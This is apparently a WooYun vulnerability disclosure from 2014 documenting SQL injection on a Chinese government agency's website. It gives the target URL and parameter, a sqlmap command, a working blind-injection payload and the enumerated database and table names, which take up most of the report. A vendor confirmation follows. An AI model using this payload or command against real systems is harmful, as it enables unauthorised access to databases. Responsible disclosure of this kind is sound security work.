中华人民共和国国家外国专家局SQL注射

漏洞详情

披露状态:

2014-03-16: 细节已通知厂商并且等待厂商处理中
2014-03-22: 厂商已经确认,细节仅向厂商公开
2014-04-01: 细节向核心白帽子及相关领域专家公开
2014-04-11: 细节向普通白帽子公开
2014-04-21: 细节向实习白帽子公开
2014-04-30: 细节向公众公开

简要描述:

中华人民共和国国家外国专家局 SQL注射 SQLMAP 验证
State Administration of Foreign Experts Affairs, the P.R. of China SQLi

详细说明:

漏洞位置:

http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1



normal.png





注意 level 5 别忘了

C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5





sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| cv_info |
| cvedu_info |
| cvexp_info |
| empl_info |
| job_info |
| jobapply_info |
| jobrecom_info |
| key_info |
| menu_info |
| myjoblist_info |
| news_info |
| para_info |
+----------------------------------------------+

Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+

Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info |
| assign_info |
| col_info |
| top_info |
+----------------------------------------------+

Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplexpert_info |
| emplregis_info |
| enqu_info |
| expert_info |
| filelog_info |
| key_info |
| menu_info |
| news_info |
| para_info |
| proj_info |
| projexp_info |
| safeauser_info |
| tgproj_info |
| tgprojcost_info |
| tgprojref_info |
| tgprojsbm_info |
| yzproj_info |
| yzprojcost_info |
| yzprojref_info |
| yzprojsbm_info |
+----------------------------------------------+

Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| attach_info |
| catalog_info |
| ceproj_info |
| chklog_info |
| cont_info |
| cost_info |
| empl_info |
| filelog_info |
| key_info |
| member_info |
| menu_info |
| news_info |
| para_info |
| projexp_info |
| projext_info |
| projlog_info |
| safeauser_info |
| schedule_info |
+----------------------------------------------+

Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplacct_info |
| emplexpert_info |





SqLMAP.png



仅获取数据表名称,不再继续深入

漏洞证明:

注意 level 5 别忘了

C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5





sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| cv_info |
| cvedu_info |
| cvexp_info |
| empl_info |
| job_info |
| jobapply_info |
| jobrecom_info |
| key_info |
| menu_info |
| myjoblist_info |
| news_info |
| para_info |
+----------------------------------------------+

Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+

Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info |
| assign_info |
| col_info |
| top_info |
+----------------------------------------------+

Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplexpert_info |
| emplregis_info |
| enqu_info |
| expert_info |
| filelog_info |
| key_info |
| menu_info |
| news_info |
| para_info |
| proj_info |
| projexp_info |
| safeauser_info |
| tgproj_info |
| tgprojcost_info |
| tgprojref_info |
| tgprojsbm_info |
| yzproj_info |
| yzprojcost_info |
| yzprojref_info |
| yzprojsbm_info |
+----------------------------------------------+

Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| attach_info |
| catalog_info |
| ceproj_info |
| chklog_info |
| cont_info |
| cost_info |
| empl_info |
| filelog_info |
| key_info |
| member_info |
| menu_info |
| news_info |
| para_info |
| projexp_info |
| projext_info |
| projlog_info |
| safeauser_info |
| schedule_info |
+----------------------------------------------+

Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplacct_info |
| emplexpert_info |





SqLMAP.png



仅获取数据表名称,不再继续深入

修复方案:

过滤得更加彻底一些吧

版权声明:转载请注明来源 lxj616@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-22 21:49

厂商回复:

CNVD确认并复现所述情况,转由CNCERT上报给国家某信息安全协调机构,由其后续通报处置。

最新状态:

暂无


漏洞评价: